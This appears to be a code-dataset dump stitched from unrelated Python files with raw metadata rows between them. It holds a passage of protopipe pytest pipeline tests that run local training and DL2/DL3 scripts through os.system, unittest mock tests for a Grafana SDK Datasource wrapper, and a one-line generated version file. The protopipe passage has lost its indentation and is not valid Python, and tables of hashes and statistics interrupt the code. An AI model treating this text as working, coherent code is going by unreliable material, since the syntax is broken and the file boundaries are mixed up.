"""Launch protopipe.scripts.build_model for a AdaBoostRegressor based on DecisionTreeRegressor."""
infile = pipeline_testdir / f"test_gamma1_noImages_{test_case}.h5"
outdir = pipeline_testdir / f"energy_model_{test_case}"
command = f"python {build_model.__file__}\
--config_file {config_AdaBoostRegressor}\
--infile_signal {infile}\
--outdir {outdir}\
--cameras_from_file"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
assert exit_status == 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="EN_2", depends=["g1N"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="ES_2", depends=["g1S"]),
),
],
)
def test_BUILD_ENERGY_MODEL_RandomForestRegressor(test_case, pipeline_testdir):
"""Launch protopipe.scripts.build_model for a RandomForestRegressor."""
infile = pipeline_testdir / f"test_gamma1_noImages_{test_case}.h5"
outdir = pipeline_testdir / f"energy_model_{test_case}"
command = f"python {build_model.__file__}\
--config_file {config_RandomForestRegressor}\
--infile_signal {infile}\
--outdir {outdir}\
--cameras_from_file"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
assert exit_status == 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="g2N", depends=["EN_2"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="g2S", depends=["ES_2"]),
),
],
)
def test_GET_GAMMAS_FOR_CLASSIFICATION_MODEL(test_case, pipeline_testdir):
modelpath = pipeline_testdir / f"energy_model_{test_case}"
outpath = pipeline_testdir / f"test_gamma2_noImages_{test_case}.h5"
command = f"python {data_training.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['gamma2'].parent}\
-f {input_data[test_case]['gamma2'].name}\
--estimate_energy True\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {modelpath}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# check that the produced HDF5 file is non-empty
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="p1N", depends=["EN_2"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="p1S", depends=["ES_2"]),
),
],
)
def test_GET_PROTONS_FOR_CLASSIFICATION_MODEL(test_case, pipeline_testdir):
modelpath = pipeline_testdir / f"energy_model_{test_case}"
outpath = pipeline_testdir / f"test_proton1_noImages_{test_case}.h5"
command = f"python {data_training.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['proton1'].parent}\
-f {input_data[test_case]['proton1'].name}\
--estimate_energy True\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {modelpath}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command:
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# check that the produced HDF5 file is non-empty
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="C1", depends=["g2N", "p1N"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="C2", depends=["g2S", "p1S"]),
),
],
)
def test_BUILD_CLASSIFICATION_MODEL_RandomForestClassifier(test_case, pipeline_testdir):
"""Launch protopipe.scripts.build_model for a Random Forest classifier."""
infile_signal = pipeline_testdir / f"test_gamma2_noImages_{test_case}.h5"
infile_background = pipeline_testdir / f"test_proton1_noImages_{test_case}.h5"
outdir = pipeline_testdir / f"classification_model_{test_case}"
command = f"python {build_model.__file__}\
--config_file {config_RandomForestClassifier}\
--infile_signal {infile_signal}\
--infile_background {infile_background}\
--outdir {outdir}\
--cameras_from_file"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command:
{command}
"""
)
exit_status = system(command)
assert exit_status == 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH", marks=pytest.mark.dependency(name="g3N", depends=["C1"])
),
pytest.param(
"PROD3B_CTA_SOUTH", marks=pytest.mark.dependency(name="g3S", depends=["C2"])
),
],
)
def test_GET_DL2_GAMMAS(test_case, pipeline_testdir):
    """Launch protopipe.scripts.write_dl2 on the gamma test sample."""
regressor_path = pipeline_testdir / f"energy_model_{test_case}"
classifier_path = pipeline_testdir / f"classification_model_{test_case}"
outpath = pipeline_testdir / f"test_DL2_tail_gamma_noImages_{test_case}.h5"
command = f"python {write_dl2.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['gamma3'].parent}\
-f {input_data[test_case]['gamma3'].name}\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {regressor_path}\
--classifier_config {config_RandomForestClassifier}\
--classifier_dir {classifier_path}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command:
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# sanity checks on the produced HDF5 file
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
assert file.root._v_attrs["status"] == "complete"
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH", marks=pytest.mark.dependency(name="p2N", depends=["C1"])
),
pytest.param(
"PROD3B_CTA_SOUTH", marks=pytest.mark.dependency(name="p2S", depends=["C2"])
),
],
)
def test_GET_DL2_PROTONS(test_case, pipeline_testdir):
    """Launch protopipe.scripts.write_dl2 on the proton test sample."""
regressor_path = pipeline_testdir / f"energy_model_{test_case}"
classifier_path = pipeline_testdir / f"classification_model_{test_case}"
outpath = pipeline_testdir / f"test_DL2_tail_proton_noImages_{test_case}.h5"
command = f"python {write_dl2.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['proton2'].parent}\
-f {input_data[test_case]['proton2'].name}\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {regressor_path}\
--classifier_config {config_RandomForestClassifier}\
--classifier_dir {classifier_path}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command:
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# sanity checks on the produced HDF5 file
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
assert file.root._v_attrs["status"] == "complete"
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH", marks=pytest.mark.dependency(name="elN", depends=["C1"])
),
pytest.param(
"PROD3B_CTA_SOUTH", marks=pytest.mark.dependency(name="elS", depends=["C2"])
),
],
)
def test_GET_DL2_ELECTRONS(test_case, pipeline_testdir):
    """Launch protopipe.scripts.write_dl2 on the electron test sample."""
regressor_path = pipeline_testdir / f"energy_model_{test_case}"
classifier_path = pipeline_testdir / f"classification_model_{test_case}"
outpath = pipeline_testdir / f"test_DL2_tail_electron_noImages_{test_case}.h5"
command = f"python {write_dl2.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['electron1'].parent}\
-f {input_data[test_case]['electron1'].name}\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {regressor_path}\
--classifier_config {config_RandomForestClassifier}\
--classifier_dir {classifier_path}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command:
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# sanity checks on the produced HDF5 file
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
assert file.root._v_attrs["status"] == "complete"
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="DL3N", depends=["g3N", "p2N", "elN"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="DL3S", depends=["g3S", "p2S", "elS"]),
),
],
)
def test_GET_DL3_ED_prod3b(test_case, pipeline_testdir):
    """Launch protopipe.scripts.make_performance_EventDisplay to produce DL3 data."""
template_input_file = f"test_DL2_{{}}_{{}}_noImages_{test_case}.h5"
command = f"python {make_performance_EventDisplay.__file__}\
--config_file {config_DL3_ED_prod3b}\
--indir_parent {pipeline_testdir}\
--outdir_path {pipeline_testdir}\
--out_file_name 'test_DL3_{test_case}'\
--template_input_file {template_input_file}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command:
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# check that the output file exists and it is not empty
path = Path(pipeline_testdir) / f"test_DL3_{test_case}.fits.gz"
assert path.exists() and (path.stat().st_size > 0)
from astropy.io import fits
with fits.open(path) as hdul:
assert len(hdul) == 19 # check that all HDUs are there
for hdu in hdul[1:]:
assert hdu.size > 0 # check presence of data
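# The tests in this module shell out through os.system and assert on the raw
# exit status. A minimal, hedged sketch of the same check written with
# subprocess.run instead (an alternative pattern, not what this suite uses;
# run_and_check is a hypothetical helper name):
import subprocess
import sys

def run_and_check(args):
    """Return True when the command exits with status 0."""
    completed = subprocess.run(args, capture_output=True, text=True)
    return completed.returncode == 0

# e.g. a trivially successful command:
assert run_and_check([sys.executable, "-c", "print('ok')"])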
| 30.604607 | 102 | 0.662716 | 1,935 | 15,945 | 5.155556 | 0.10491 | 0.054531 | 0.036889 | 0.035786 | 0.825882 | 0.811949 | 0.772855 | 0.750802 | 0.73757 | 0.71672 | 0 | 0.016258 | 0.213045 | 15,945 | 520 | 103 | 30.663462 | 0.77877 | 0.079147 | 0 | 0.605063 | 0 | 0 | 0.250615 | 0.078573 | 0 | 0 | 0 | 0 | 0.063291 | 1 | 0.027848 | false | 0 | 0.020253 | 0 | 0.048101 | 0.027848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3d9cd23d91423db9039803de218c1b03f9c82210 | 21,107 | py | Python | tests/unittests/test_datasource.py | ZPascal/grafana_api_sdk | 97c347790200e8e9a2aafd47e322297aa97b964c | [
"Apache-2.0"
] | 2 | 2022-02-01T20:18:48.000Z | 2022-02-02T01:22:14.000Z | tests/unittests/test_datasource.py | ZPascal/grafana_api_sdk | 97c347790200e8e9a2aafd47e322297aa97b964c | [
"Apache-2.0"
] | 5 | 2022-01-12T06:55:54.000Z | 2022-03-26T13:35:50.000Z | tests/unittests/test_datasource.py | ZPascal/grafana_api_sdk | 97c347790200e8e9a2aafd47e322297aa97b964c | [
"Apache-2.0"
] | null | null | null | from unittest import TestCase
from unittest.mock import MagicMock, Mock, patch
from src.grafana_api.model import APIModel, DatasourceQuery
from src.grafana_api.datasource import Datasource
class DatasourceTestCase(TestCase):
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_all_datasources(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=list([{"id": 1}]))
call_the_api_mock.return_value = mock
self.assertEqual([{"id": 1}], datasource.get_all_datasources())
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_all_datasources_no_datasources(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=list())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_all_datasources()
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_id(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"id": 1}))
call_the_api_mock.return_value = mock
self.assertEqual({"id": 1}, datasource.get_datasource_by_id(1))
def test_get_datasource_by_id_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_by_id(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_id_no_datasource_available(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_by_id(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_uid(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"id": 1}))
call_the_api_mock.return_value = mock
self.assertEqual({"id": 1}, datasource.get_datasource_by_uid("test"))
def test_get_datasource_by_uid_no_uid(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_by_uid("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_uid_no_datasource_available(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_by_uid("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_name(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"id": 1}))
call_the_api_mock.return_value = mock
self.assertEqual({"id": 1}, datasource.get_datasource_by_name("test"))
def test_get_datasource_by_name_no_name(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_by_name("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_name_no_datasource_available(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_by_name("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_id_by_name(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"id": 1}))
call_the_api_mock.return_value = mock
self.assertEqual(1, datasource.get_datasource_id_by_name("test"))
def test_get_datasource_id_by_name_no_name(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_id_by_name("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_id_by_name_no_id_available(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_id_by_name("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_create_datasource(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Datasource added"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.create_datasource(dict({"test": "test"})))
def test_create_datasource_no_data_source(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.create_datasource(dict())
@patch("src.grafana_api.api.Api.call_the_api")
def test_create_datasource_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.create_datasource(dict({"test": "test"}))
@patch("src.grafana_api.api.Api.call_the_api")
def test_update_datasource(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Datasource updated"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.update_datasource(1, dict({"test": "test"})))
def test_update_datasource_no_data_source(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.update_datasource(1, dict())
@patch("src.grafana_api.api.Api.call_the_api")
def test_update_datasource_update_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.update_datasource(1, dict({"test": "test"}))
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_id(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Data source deleted"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.delete_datasource_by_id(1))
def test_delete_datasource_by_id_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.delete_datasource_by_id(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_id_delete_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.delete_datasource_by_id(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_uid(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Data source deleted"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.delete_datasource_by_uid("test"))
def test_delete_datasource_by_uid_no_datasource_uid(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.delete_datasource_by_uid("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_uid_delete_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.delete_datasource_by_uid("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_name(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Data source deleted"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.delete_datasource_by_name("test"))
def test_delete_datasource_by_name_no_name(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.delete_datasource_by_name("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_name_delete_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.delete_datasource_by_name("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_query_datasource_by_id(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"results": dict({"test": "test"})}))
call_the_api_mock.return_value = mock
datasource_query: DatasourceQuery = DatasourceQuery(1, "test")
datasource_queries: list = list()
datasource_queries.append(datasource_query)
self.assertEqual(
dict({"test": "test"}),
datasource.query_datasource_by_id("1234", "1234", datasource_queries),
)
def test_query_datasource_by_id_no_time(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.query_datasource_by_id("", "", MagicMock())
@patch("src.grafana_api.api.Api.call_the_api")
def test_query_datasource_by_id_no_query_result(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
datasource_query: DatasourceQuery = DatasourceQuery(1, "test")
datasource_queries: list = list()
datasource_queries.append(datasource_query)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.query_datasource_by_id("1234", "1234", datasource_queries)
@patch("src.grafana_api.api.Api.call_the_api")
def test_enable_datasource_permissions(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(
return_value=dict({"message": "Datasource permissions enabled"})
)
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.enable_datasource_permissions(1))
def test_enable_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.enable_datasource_permissions(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_enable_datasource_permissions_enable_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.enable_datasource_permissions(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_disable_datasource_permissions(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(
return_value=dict({"message": "Datasource permissions disabled"})
)
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.disable_datasource_permissions(1))
def test_disable_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.disable_datasource_permissions(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_disable_datasource_permissions_disable_not_possible(
self, call_the_api_mock
):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.disable_datasource_permissions(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_permissions(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"datasourceId": "Test"}))
call_the_api_mock.return_value = mock
self.assertEqual(
dict({"datasourceId": "Test"}), datasource.get_datasource_permissions(1)
)
def test_get_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_permissions(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_permissions_no_datasource_permissions_available(
self, call_the_api_mock
):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_permissions(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_add_datasource_permissions(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Datasource permission added"}))
call_the_api_mock.return_value = mock
self.assertEqual(
None, datasource.add_datasource_permissions(1, dict({"test": "test"}))
)
def test_add_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.add_datasource_permissions(0, dict())
@patch("src.grafana_api.api.Api.call_the_api")
def test_add_datasource_permissions_permission_add_not_possible(
self, call_the_api_mock
):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.add_datasource_permissions(1, dict({"test": "test"}))
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_permissions(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(
return_value=dict({"message": "Datasource permission removed"})
)
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.delete_datasource_permissions(1, 1))
def test_delete_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.delete_datasource_permissions(0, 1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_permissions_delete_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.delete_datasource_permissions(1, 1)
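# All tests above share one arrange/act/assert shape: patch Api.call_the_api so
# it returns a Mock whose .json() yields a canned payload, then assert on the
# wrapper's result (or on the Exception raised when the payload is empty). The
# pattern, distilled with a hypothetical fetch_datasource helper (illustration
# only, not part of the SDK):
from unittest.mock import Mock

def fetch_datasource(api):
    payload = api.call_the_api("/api/datasources/1").json()
    if not payload:
        raise Exception("datasource not available")
    return payload

api = Mock()
api.call_the_api.return_value.json = Mock(return_value={"id": 1})
assert fetch_datasource(api) == {"id": 1}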
| 39.087037 | 88 | 0.697967 | 2,542 | 21,107 | 5.471676 | 0.028324 | 0.048314 | 0.06902 | 0.064419 | 0.968078 | 0.953483 | 0.941405 | 0.928535 | 0.919045 | 0.908836 | 0 | 0.003235 | 0.19458 | 21,107 | 539 | 89 | 39.159555 | 0.814941 | 0 | 0 | 0.692308 | 0 | 0 | 0.076183 | 0.054579 | 0 | 0 | 0 | 0 | 0.124668 | 1 | 0.124668 | false | 0 | 0.01061 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3da4b20133d96b74e66d0da8f82e2025b544c943 | 103 | py | Python | homeassistant/components/frontend/mdi_version.py | instantchow/home-assistant | 6797365d4fd74328a0c9e961f652cfb37f48bc7d | [
"MIT"
] | null | null | null | homeassistant/components/frontend/mdi_version.py | instantchow/home-assistant | 6797365d4fd74328a0c9e961f652cfb37f48bc7d | [
"MIT"
] | null | null | null | homeassistant/components/frontend/mdi_version.py | instantchow/home-assistant | 6797365d4fd74328a0c9e961f652cfb37f48bc7d | [
"MIT"
] | null | null | null | """DO NOT MODIFY. Auto-generated by update_mdi script."""
VERSION = "e85dc66e1a0730e44f79ed11501cd79a"
| 34.333333 | 57 | 0.786408 | 11 | 103 | 7.272727 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215054 | 0.097087 | 103 | 2 | 58 | 51.5 | 0.645161 | 0.495146 | 0 | 0 | 1 | 0 | 0.695652 | 0.695652 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
